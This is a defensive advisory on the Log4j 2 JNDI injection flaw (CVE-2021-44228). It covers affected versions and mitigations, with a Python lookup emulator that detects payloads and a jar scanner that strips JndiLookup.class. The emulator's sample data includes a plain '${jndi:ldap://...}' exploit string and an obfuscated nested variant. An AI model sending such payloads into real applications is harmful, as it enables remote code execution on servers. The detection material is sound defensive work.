In the early morning of December 10, 2021, details of a remote code execution vulnerability (CVE-2021-44228) in the Apache open source project Log4j 2 were disclosed; its threat level is rated critical.
Log4j 2 is a Java-based logging framework. It is a rewrite of the original Log4j and adds many features: log output can be directed to the console, files, GUI components and other destinations, and by assigning a level to each log event users gain fine-grained control over what gets logged.
Log4j is currently one of the most widely used Java logging frameworks in the world, so the vulnerability also reaches many top-tier open source components such as Apache Struts2, Apache Solr, Apache Druid and Apache Flink. Because it is trivial to exploit, an attacker who triggers it can execute arbitrary code on the target server, with severe consequences for the victim.
Vulnerability details
The root cause is a JNDI injection in Log4j 2's lookup feature. Lookups let developers pull values from the runtime environment through `${...}` expressions and a set of protocols, and Log4j 2 up to 2.14.1 evaluated those expressions not only in its configuration but in the text of every log message. Triggering the bug is therefore trivial: as soon as the keyword `${` appears in log content, whatever it encloses is resolved as a variable, and the `jndi` lookup resolves its argument by performing a JNDI lookup (typically over LDAP or RMI) against whatever server the attacker named. Because applications routinely log attacker-controlled data such as HTTP headers, usernames and form fields, an unauthenticated attacker with no privileges at all can reach this sink, and a malicious naming server can make the target JVM load and execute remote code, i.e. run arbitrary commands.
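To make the lookup mechanism concrete, here is an added example (not Log4j 2's own code, and not from the original post) in Python that emulates the `${...}` substitution Log4j 2 <= 2.14.1 applied to every log message. Only the `lower`, `upper`, `env` and `jndi` lookups and the `:-` default syntax are implemented, and the `jndi` branch records the URL a vulnerable server would have contacted instead of performing the lookup, which turns the emulator into a detector that also catches payloads hidden behind nested lookups. The log lines, the LDAP address and the function names are all constructed for the example.

```python
import os
import re

# Constructed sample log lines (not real traffic). Line 2 is the plain
# payload, line 3 the same payload hidden behind nested lookups, line 4 a
# harmless use of the default-value syntax.
SAMPLE_LOG_LINES = [
    "GET /login 200 ua=Mozilla/5.0",
    "GET /login 200 ua=${jndi:ldap://203.0.113.5:1389/a}",
    "GET /login 200 ua=${${lower:J}${::-n}di:${lower:LDAP}://203.0.113.5:1389/a}",
    "GET /login 200 ua=${env:NO_SUCH_VAR:-plain-text}",
]

# Matches a ${...} with no nested ${ inside, i.e. the innermost expression.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# An expression that cannot be resolved is parked behind this sentinel so
# the expansion loop terminates; it is turned back into "${" at the end.
_UNRESOLVED = "\x00{"


def _resolve(expr, jndi_calls):
    """Resolve one innermost lookup. Only a handful of Log4j 2 lookups are
    emulated; in real Log4j 2 the "jndi" branch performed a live JNDI
    lookup (the RCE sink), here it only records the URL it would contact."""
    body, has_default, default = expr.partition(":-")   # ${key:value:-default}
    key, _, value = body.partition(":")
    key = key.lower()
    if key == "lower":
        return value.lower()
    if key == "upper":
        return value.upper()
    if key == "env":
        found = os.environ.get(value)
        if found is not None:
            return found
    elif key == "jndi":
        jndi_calls.append(value)
        return ""          # a real lookup splices in whatever the naming service returned
    if has_default:
        return default     # ${::-j} resolves to "j": empty key, default "j"
    return _UNRESOLVED + expr + "}"


def expand(message, jndi_calls=None):
    """Expand ${...} innermost-first, as Log4j 2 <= 2.14.1 did for every
    formatted log message, and return the final text."""
    if jndi_calls is None:
        jndi_calls = []
    while True:
        m = _INNERMOST.search(message)
        if m is None:
            return message.replace(_UNRESOLVED, "${")
        message = message[:m.start()] + _resolve(m.group(1), jndi_calls) + message[m.end():]


def find_jndi_targets(line):
    """Return every JNDI URL a vulnerable Log4j 2 would have contacted while
    formatting this line. Running detection after expansion is what catches
    the obfuscated form; a grep for the literal "${jndi:" misses it."""
    calls = []
    expand(line, calls)
    return calls


if __name__ == "__main__":
    for line in SAMPLE_LOG_LINES:
        print(find_jndi_targets(line) or "clean", "<-", line)
```

Run it to see line 3 collapse to the same `ldap://` target as line 2. A detection rule that only matches the literal text `${jndi:` sees nothing on line 3, which is why post-expansion matching, or at least matching on `${` followed by nested lookups, belongs in the rule set.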
Affected versions: Apache Log4j 2.x <= 2.14.1 (2.0-beta9 through 2.14.1).
Applications that bundle a vulnerable Log4j 2 are affected as well, among them:
- spring-boot-starter-log4j2
- Apache Struts2
- Apache Solr
- Apache Flink
- Apache Druid
- Elasticsearch
- Flume
- Dubbo
- Logstash
- Kafka
Whether a given deployment is actually exploitable depends on the log4j-core version it ships and on whether it logs attacker-controlled input, so check the jar on disk rather than relying on the product name alone.
Bug fix
Apache has released log4j-2.15.0-rc2, which fixes the vulnerability; upgrade as soon as possible. Later releases went further (2.16.0 removed message lookups altogether and disabled JNDI access by default, and additional fixes followed), so target the newest 2.x release available rather than 2.15.0 specifically.
Official link: https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2
If upgrading is not immediately possible, the following emergency measures disable message lookups; complete the version upgrade as soon as it is practical:
- Add the JVM parameter -Dlog4j2.formatMsgNoLookups=true
- Set log4j2.formatMsgNoLookups=true in a log4j2.component.properties file on the classpath
- Set the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true
These switches only exist in Log4j 2.10 and later; for 2.0-beta9 through 2.9.x they have no effect. For those versions, and as the more robust workaround for any 2.x release before 2.16.0, remove the JndiLookup class (org/apache/logging/log4j/core/lookup/JndiLookup.class) from the log4j-core jar, since Apache later noted that the property-based mitigations do not cover every configuration. Whichever measure you apply, restart the JVM afterwards and verify that the running process picked it up.
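The following added example (my own illustration, not an Apache tool and not from the original post) shows the check a practitioner would run before choosing one of these measures: it walks a directory tree for log4j-core jars, reads the version from the jar's Maven pom.properties, reports which workaround that version supports, and writes a copy with JndiLookup.class removed. The sample jar it scans is constructed in a temporary directory so the script runs offline; the advice strings are my own summary of the measures above, and all function names are assumptions.

```python
import os
import tempfile
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def inspect_jar(path):
    """Return (version or None, has_jndi_lookup) for one jar on disk."""
    with zipfile.ZipFile(path) as zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPS in names:
            for raw in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if raw.strip().startswith("version="):
                    version = raw.strip().split("=", 1)[1].strip()
        return version, JNDI_CLASS in names


def scan(root):
    """Walk a directory tree and yield (path, version, has_jndi_lookup) for
    every log4j-core jar found, including ones nested in lib/ folders."""
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.startswith("log4j-core") and name.endswith(".jar"):
                path = os.path.join(dirpath, name)
                version, has_jndi = inspect_jar(path)
                yield path, version, has_jndi


def version_tuple(version):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0). Qualifiers are dropped."""
    parts = []
    for piece in version.split("."):
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        parts.append(int(digits) if digits else 0)
    return tuple(parts)


def classify(version, has_jndi):
    """Map a jar to the emergency measure its version actually supports."""
    if not has_jndi:
        return "JndiLookup absent: jndi lookup cannot be reached"
    if version is None:
        return "version unknown: remove JndiLookup.class, then upgrade"
    v = version_tuple(version)
    if v >= (2, 15):
        return "2.15.0 or later: message lookups off by default, upgrade to latest 2.x"
    if v >= (2, 10):
        return "2.10-2.14.1: formatMsgNoLookups=true works, removing JndiLookup.class is safer, upgrade"
    return "older than 2.10: formatMsgNoLookups unsupported, remove JndiLookup.class, upgrade"


def strip_jndi_lookup(src, dst):
    """Write a copy of src without JndiLookup.class (same effect as deleting
    the entry from the original jar with the zip command)."""
    with zipfile.ZipFile(src) as zin, zipfile.ZipFile(dst, "w", zipfile.ZIP_DEFLATED) as zout:
        for item in zin.infolist():
            if item.filename != JNDI_CLASS:
                zout.writestr(item, zin.read(item.filename))
    return dst


def build_sample_jar(path, version="2.14.1", with_jndi=True):
    """Constructed stand-in for log4j-core-<version>.jar: entry names and
    pom.properties are realistic, the class bodies are fake."""
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr(POM_PROPS, "groupId=org.apache.logging.log4j\n"
                               "artifactId=log4j-core\nversion=%s\n" % version)
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
        if with_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
    return path


def run_demo():
    """Build the constructed jar in a temp dir, scan it, strip it, re-inspect."""
    with tempfile.TemporaryDirectory() as tmp:
        os.makedirs(os.path.join(tmp, "lib"))
        src = build_sample_jar(os.path.join(tmp, "lib", "log4j-core-2.14.1.jar"))
        found = [(os.path.relpath(p, tmp), v, j) for p, v, j in scan(tmp)]
        before = inspect_jar(src)
        dst = strip_jndi_lookup(src, os.path.join(tmp, "lib", "log4j-core-2.14.1-nojndi.jar"))
        after = inspect_jar(dst)
    return {"found": found, "before": before, "after": after,
            "advice_before": classify(*before), "advice_after": classify(*after)}


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:                      # real use: scan a deployment root
        for path, version, has_jndi in scan(sys.argv[1]):
            print(path, version, classify(version, has_jndi))
    else:                                      # no argument: run on the constructed jar
        for key, value in run_demo().items():
            print(key, value)
```

Saved as, say, log4j_scan.py (a hypothetical name), `python log4j_scan.py /opt/app` prints one line per jar with the measure that applies. The equivalent shell command for removing the class in place is `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`; either way the application must be restarted so the JVM no longer has the old class loaded.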
Whether it was the vulnerability in the encryption of Apache Shiro's rememberMe cookie the year before, or the Fastjson remote code execution advisory in May last year, network security always seems to have a new problem. But discovering and fixing vulnerabilities is itself a security upgrade: a defence that stands still will soon be breached, and only continuous updates and upgrades amount to real network security.